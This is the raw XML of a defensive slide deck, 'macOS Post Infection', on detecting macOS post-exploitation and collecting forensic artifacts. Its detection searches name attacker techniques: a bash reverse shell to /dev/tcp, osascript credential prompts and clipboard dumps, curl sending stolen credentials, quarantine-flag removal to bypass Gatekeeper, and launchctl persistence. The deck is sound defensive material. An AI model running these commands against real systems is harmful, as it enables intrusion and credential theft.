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99" r:id="rId15"/>
    <p:sldId id="271" r:id="rId16"/>
    <p:sldId id="272" r:id="rId17"/>
    <p:sldId id="273" r:id="rId18"/>
    <p:sldId id="27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F7"/>
    <a:srgbClr val="FF5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81"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="115" d="100"/>
          <a:sy n="115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1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2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8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5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9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73D71-5F7C-014C-A5AB-7386A9785200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B6374A-86CD-DC42-BABF-0C12A9503E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402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areed/pic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edowens/PICT-Swift/tree/master/pict-Swift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dowens/macOS-browserhist-parser/tree/master/parse-browser-history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edowens/macOS-browserhist-parser/tree/master/parse-browser-history" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://objective-see.com/downloads/MacMalware_2019.pdf" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://its-a-feature.github.io/posts/2018/01/Active-Directory-Discovery-with-a-Mac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edowens/PICT-Swift/tree/master/pict-Swift" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/thomasareed/pict" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/red-teaming-with-a-blue-team-mentaility/b0ede7ecfeb9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D571-DECF-C74C-A586-B35F00A59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8710" y="916597"/>
            <a:ext cx="8637073" cy="2920713"/>
          </a:xfrm>
          <a:effectLst>
            <a:glow rad="127000">
              <a:srgbClr val="FF5A9B"/>
            </a:glow>
            <a:outerShdw blurRad="50800" dist="38100" dir="13500000" algn="br" rotWithShape="0">
              <a:schemeClr val="accent6">
                <a:lumMod val="60000"/>
                <a:lumOff val="40000"/>
                <a:alpha val="49000"/>
              </a:schemeClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="50800" dist="38100" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="accent6">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>macOS Post Infection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9EC77-490B-7640-A9A0-E8CCC2769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6037" y="5510011"/>
            <a:ext cx="8637072" cy="977621"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0"/>
              <a:t>Cedric Owens</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" err="1"/>
              <a:t>ACoD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none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97466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parent-child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3000" dirty="0"/>
              <a:t>Any MS Office product spawning curl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Macro code can use curl to send out creds after prompting the user with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>osascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>macphish</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t> is an example)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Under the hood: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1CBDDD-3F52-824E-8C13-2375A257B1D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1132788" y="5327013"/>
            <a:ext cx="9554819" cy="651936"/>
            <a:chOff x="895392" y="4546596"/>
            <a:chExt cx="9554819" cy="65193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5CE9D1-9105-8D4D-A828-EA9F5D536606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Office Product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856819-F1A4-0946-84C1-B1FDD9C37D7E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4715390" y="4546596"/>
              <a:ext cx="2508718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usr</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>/bin/curl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C5D1AC-45D5-774E-B384-ECE24E61322C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8553677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Creds sent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B927E19-50CC-3F4E-9B9B-845FBEF8F40E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327B9B-4574-7246-835F-FB0A9A70CFE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108" y="4859862"/>
              <a:ext cx="1311280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1050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F423A-B8DD-DA48-B749-AEBE4C9C892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48934"/>
            <a:ext cx="15477425" cy="26098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03ABA9-C2B0-5B43-8B9B-C8ED5049D4F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="499321" y="1486831"/>
            <a:ext cx="862639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MS Office macro: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Uses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1"/>
              <a:t>osascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t> to prompt the user for creds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Uses curl to steal the creds</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="136992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parent-child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5"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t>python spawning </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1"/>
              <a:t>osascript</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="30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Easy method for post exploitation tasks (dump clipboard, prompt for credentials, get system info, etc.)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Most valid uses will call </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>osascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t> directly from /bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t> or /bin/bash (not from a scripting language)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Under the hood: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1CBDDD-3F52-824E-8C13-2375A257B1D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1132788" y="5528181"/>
            <a:ext cx="9536531" cy="651936"/>
            <a:chOff x="895392" y="4546596"/>
            <a:chExt cx="9536531" cy="65193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5CE9D1-9105-8D4D-A828-EA9F5D536606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python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856819-F1A4-0946-84C1-B1FDD9C37D7E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4715390" y="4546596"/>
              <a:ext cx="2508718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usr</a:t>
              </a:r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osascript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C5D1AC-45D5-774E-B384-ECE24E61322C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8535389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task performed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B927E19-50CC-3F4E-9B9B-845FBEF8F40E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327B9B-4574-7246-835F-FB0A9A70CFE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108" y="4859862"/>
              <a:ext cx="1311280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408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21" y="2528163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Helpful detections/searches: </a:t>
            </a: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2. active directory enumeration searches</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="302204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 directory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Use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/Active Directory/&lt;AD_DOMAIN&gt;/All Domains</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t> followed by 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read</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t> or 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ls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t> command</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3000" i="1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This query can be used to list domain groups, users, computers, etc.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Should rarely see this (outside of admin systems)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Example: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408F4-3877-2A47-91EE-6C41F7C42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93" y="5694865"/>
            <a:ext cx="10087027" cy="54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5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 directory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3000" dirty="0"/>
              <a:t>Use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. cat /Users/&lt;username&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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Similar to net user &lt;username&gt; /domain on Windows – pulls basic AD info for the user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Should rarely see this (outside of admin systems)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r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t>Use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. read /Groups/admin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Can be used to list local accounts with admin rights on the macOS host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8252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 directory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3000" dirty="0"/>
              <a:t>Use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dsconfigad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-show </a:t>
            </a:r>
            <a:endParaRPr lang="en-US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Shows domain info including what AD groups have admin rights on the macOS host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Should rarely see this (outside of admin systems)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4433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Active directory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48" y="212034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5"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t>Use of the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klist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/>
              <a:t>command (ex: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1"/>
              <a:t>klist</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t> –c &lt;cache&gt;)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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May be used in attempt to list cached Kerberos tickets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Should rarely see this (outside of admin systems)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4578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Local account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703693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Use of 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. ls /Users</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3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Use of </a:t>
            </a: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dscacheutil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-q group -a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gid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80</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3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</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3000" i="1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Can be used to enumerate local macOS user accounts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Likely not used much outside of admin systems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F308D-A772-0448-9DBD-1C87CCDD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326" y="4999990"/>
            <a:ext cx="7297275" cy="172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80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24" y="2795792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Helpful detections/searches: </a:t>
            </a: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3. Command line searches/detections </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="4800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
            </a:b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b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF38F7"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(not the best but can still be of use)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="296169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0099-B22D-9B4C-ADDA-D97E9C3E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42635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A194-90E4-9840-918E-A7DB3D83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585913"/>
            <a:ext cx="6572249" cy="4672011"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"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600" dirty="0"/>
              <a:t>Red Team At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600" dirty="0"/>
              <a:t>Austin-based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600" dirty="0"/>
              <a:t>Blue Team Experience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600" dirty="0"/>
              <a:t>      macOS post exploitation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600" dirty="0"/>
              <a:t>Enjoy 80s/90s Nostalgia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        @</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>cedowens</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/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1EA5DBCB-32BE-B64F-8390-12F9A516B960}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1286177" y="3813426"/>
            <a:ext cx="501609" cy="532446"/>
          </a:xfrm>
          <a:prstGeom prst="hear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1744A-24BD-6140-8502-B980FDA2F28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419" y="4971655"/>
            <a:ext cx="1023124" cy="1023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2F185-0C43-8F42-A777-428B13284BC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9106" y="1979458"/>
            <a:ext cx="5017277" cy="336118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EAA225-39AB-DD48-8130-4E741CBC975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4732" y="1491870"/>
            <a:ext cx="768185" cy="7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77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224226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Searching for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osascript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-l JavaScript </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t>along with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eval</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="30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This is indicative of JXA (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t> for automation) using the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>osascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t> binary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Malicious apps invoking JXA get around Apple notarization checks since post exploitation code is server side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09752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510854"/>
            <a:ext cx="6278618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3000" dirty="0"/>
              <a:t>Searching for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osascript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-e </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t>along with 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password </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t>or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Password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This is indicative of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>osascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t> prompting the user to enter credentials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6CC7F-A317-AA4D-A821-776BC491F38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942" y="5330744"/>
            <a:ext cx="8965958" cy="1359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5C53D1-0A63-254F-A56C-CE7D5859F4C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8562" y="2267712"/>
            <a:ext cx="5208487" cy="24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9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2242374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r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t>Searching for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osascript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-e </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t>along with 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clipboard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This is indicative of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>osascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t> dumping clipboard contents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B8CB8-3056-CB49-9B05-FB42FA94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43" y="5054599"/>
            <a:ext cx="9972425" cy="85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92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230" y="1803462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3000" dirty="0"/>
              <a:t>Basic reverse shell commands at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1"/>
              <a:t>pentestmonkey.net</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="30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Ex: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>searching for 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bash -</a:t>
            </a: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2800" dirty="0"/>
              <a:t> with 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/dev/</a:t>
            </a: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tcp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Looking</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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/>
              <a:t>for</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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bash -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="26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&gt;&amp; /dev/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="26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tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="26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/10.0.0.1/8080 0&gt;&amp;1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Detect several methods using bash, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>perl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>, python, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t> for spawning a reverse shell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44971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2242374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5"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t>Searching for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screencapture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-x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Quiet screenshots should be pretty rare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Detect a malicious process attempting to quietly get a screenshot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5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7663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876614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6"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t>Searching for uses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xattr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-d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t> or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xattr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-c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xattr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-d </a:t>
            </a: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com.apple.quarantine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&lt;file&gt;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xattr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-c &lt;file&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> 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The quarantine flag is appended to downloaded files and is inspected by Gatekeeper. Removing this flag will allow this file to run without Gatekeeper intervention.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6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67157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Command line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876614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7"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t>Searching for uses of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3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launchctl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3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load</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="30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launchctl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load &lt;</a:t>
            </a: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plist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 (or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2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launchctl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2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start)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Launch agents and launch daemons are still the most commonly used persistence in Objective See’s “The Mac Malware of 2019” Report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7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66353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21" y="2528163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Helpful detections/searches: </a:t>
            </a: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4. OTHER USEFUL searches/detections</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="44183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OTHER USEFUL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657158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Single python process making lots of outbound network connections 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.app package making prolonged network connections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Single macOS host connecting to the same destination host intermittently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Look for periodic beaconing or command and control activity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46871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OTHER USEFUL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42" y="1876614"/>
            <a:ext cx="10686026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r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t>Searching for unique user agent strings (the less common)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Might seem antiquated, but some malware does still use unique user agent strings (ex: an app running JXA)</a:t>
            </a:r>
          </a:p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4"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3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6965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61619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30" y="1510854"/>
            <a:ext cx="6263671" cy="3450613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300" dirty="0"/>
              <a:t>macOS “State of the Union”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300" dirty="0"/>
              <a:t>A Look At macOS Detections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300" dirty="0"/>
              <a:t>Useful macOS Artifacts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300" dirty="0"/>
              <a:t>Automating macOS artifact collection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300" dirty="0"/>
              <a:t>Helpful resources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7F1CF-FFFD-FB4A-B3AE-4A4911B4210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5239" y="1591763"/>
            <a:ext cx="4173536" cy="46106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17169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85" y="3277971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Useful artifacts for </a:t>
            </a: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post infection analysis </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="4800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="4800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
            </a:b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83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Useful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Thomas Reed (@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1"/>
              <a:t>thomasareed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t>) is the brains behind several modern post infection analysis techniques on macOS.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Open source automated tools for artifact collection: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PICT: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://github.com/thomasareed/pict</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="28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PICT-Swift: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://github.com/cedowens/PICT-Swift/tree/master/pict-Swift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8290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Browser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6305" y="1382838"/>
            <a:ext cx="6565393" cy="49265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QuarantineEventsV2 database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~/Library/Preferences/com.apple.LaunchServices.QuarantineEventsV2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Safari History </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>db</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>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~/Library/Safari/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2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History.db</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="20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Chrome History </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>db</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>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~/Library/Application Support/Google/Chrome/Default/History</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="20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Firefox History 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~/Library/Application Support/Firefox/Profiles&lt;random&gt;.default-release/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="20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places.sqlite</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="20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endParaRPr lang="en-US" sz="20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B7EA5-EEC0-7B49-B745-AA149FA20CB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4007" y="1865692"/>
            <a:ext cx="5637993" cy="421684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85476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Browser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44" y="2157984"/>
            <a:ext cx="12045656" cy="446227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400" dirty="0"/>
              <a:t>Mach-o Binary to do this: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://github.com/cedowens/macOS-browserhist-parser/tree/master/parse-browser-history</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="24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24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24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18867-E5A4-DD4E-A569-7DF50D3CC86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33544"/>
            <a:ext cx="16198261" cy="15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9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44" y="1218246"/>
            <a:ext cx="12045656" cy="49265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Common Places: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/Library/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>StartupItems</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>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/System/Library/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>StartupItems</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>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/Library/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>LaunchAgents</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>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/Library/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>LaunchDaemons</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>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~/Library/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>LaunchAgents</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>/at/jobs/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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>launchd.conf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="18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Searches: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osascript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-e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‘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tell application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System Events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”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to get the path of every login item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’</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="18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launchctl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list: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>list launch agents/daemons</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="18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kextstat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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> list kernel extensions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crontab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-l</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>: list </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>cron</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> jobs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defaults read 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com.apple.loginwindow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LoginHook</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>: check for login hooks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22CD5-3CFC-BA4D-BC5F-1C2EA7E78A9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5980" y="1437471"/>
            <a:ext cx="5036036" cy="3319673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44812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Browser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44" y="1218246"/>
            <a:ext cx="12045656" cy="49265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Chrome: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Iterate through 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~/Library/Application Support/Google/Chrome/Default/Extensions/&lt;random&gt;/&lt;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version_number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&gt;/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manifest.json</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="18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Pull the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“name”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“description”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>, and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“permissions”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> data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/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/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Firefox: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Iterate through ~/Library/Application Support/Firefox/Profiles/&lt;random&gt;.default-release/extensions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Search for and extract any .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>xpi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> files (Firefox extensions)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Safari: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Iterate through ~/Library/Safari/Extensions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Search for .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>safariextz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> extensions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2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18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FB133-F202-0346-B992-5EE7696D34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56143"/>
            <a:ext cx="12192000" cy="7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68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System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44" y="1218246"/>
            <a:ext cx="12045656" cy="5639754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List of All Installs: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/private/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var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db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/receipts </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>– list of packages and apps that have been installed and when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/Library/Receipts/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InstallHistory.plist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/>
              <a:t>– list of installations and install dates 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System Logs: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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>/log/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dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>/audit/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log collect &lt;time period&gt; --output &lt;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out_path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Network Info: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scutil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--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dns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>: check DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> info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pfctl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-s rules</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>: check firewall rules for interesting entries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etc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/hosts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Process Info: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ps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axo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user,pid,ppid,start,time,command</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" i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lsof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-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="18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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="18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1800" dirty="0"/>
              <a:t>get process network info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endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
